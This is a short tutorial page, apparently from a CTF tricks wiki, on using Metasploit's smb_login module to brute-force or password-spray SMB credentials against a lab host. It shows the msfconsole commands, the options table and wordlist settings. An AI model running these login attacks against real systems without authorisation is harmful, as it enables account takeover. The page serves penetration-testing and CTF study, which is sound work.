> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-11/bruteforce/trick-0418.md).

# SMB Login Bruteforce/Spray (Metasploit)

***

Use the Metasploit `smb_login` module to perform a login attack against the SMB service. This module supports using user and password lists for bruteforcing specific users or spraying passwords across multiple users. It is an auxiliary scanner module designed to check for valid SMB credentials.

Open `msfconsole` and load the auxiliary module:

```markdown
msfconsole
use auxiliary/scanner/smb/smb_login
```

Once the module is loaded, you can view its options using the `show options` command:

```markdown
msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for every username
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD          <blank>          no        A specific password to authenticate with
   PASS_FILE         <blank>          no        File containing passwords, one per line
   RHOSTS            <blank>          yes       The target host(s), range CIDR identifiers, or hosts file with syntax 'file:<path>'
   RPORT             445              yes       The target port (TCP)
   SMBDomain         .                no        The SMB domain to authenticate against
   SMBUser           <blank>          no        A specific username to authenticate with
   STOP_ON_SUCCESS   false            yes       Stop when a credential pair works for a host, unless VERBOSE is true
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          <blank>          no        A specific username to authenticate with
   USER_AS_PASS      false            no        Try the username as the password for every username
   USER_FILE         <blank>          no        File containing usernames, one per line
   VERBOSE           false            yes       Display failed attempts

```

Set the target IP(s) or hostnames using the `RHOSTS` option. Provide paths to your username and password files using `USER_FILE` and `PASS_FILE`. You can also specify a single `USERNAME` or `PASSWORD` if needed. The module supports trying blank passwords with `BLANK_PASSWORDS` and using the username as the password with `USER_AS_PASS`. Optionally, set `STOP_ON_SUCCESS` to `true` to stop scanning a host once a valid credential pair is found, unless `VERBOSE` is also true.

```markdown
set RHOSTS target.ine.local
set USER_FILE usernames.txt
set PASS_FILE passwords.txt
set STOP_ON_SUCCESS true
run
```

The `BRUTEFORCE_SPEED` option controls the rate of login attempts from 0 (slowest) to 5 (fastest). `THREADS` controls the number of concurrent checks. The `VERBOSE` option displays failed login attempts; otherwise, only successful ones are shown.

The module will iterate through the provided credentials against the specified target(s) and report any successful logins. Ensure your `usernames.txt` and `passwords.txt` files are properly formatted (one credential per line).
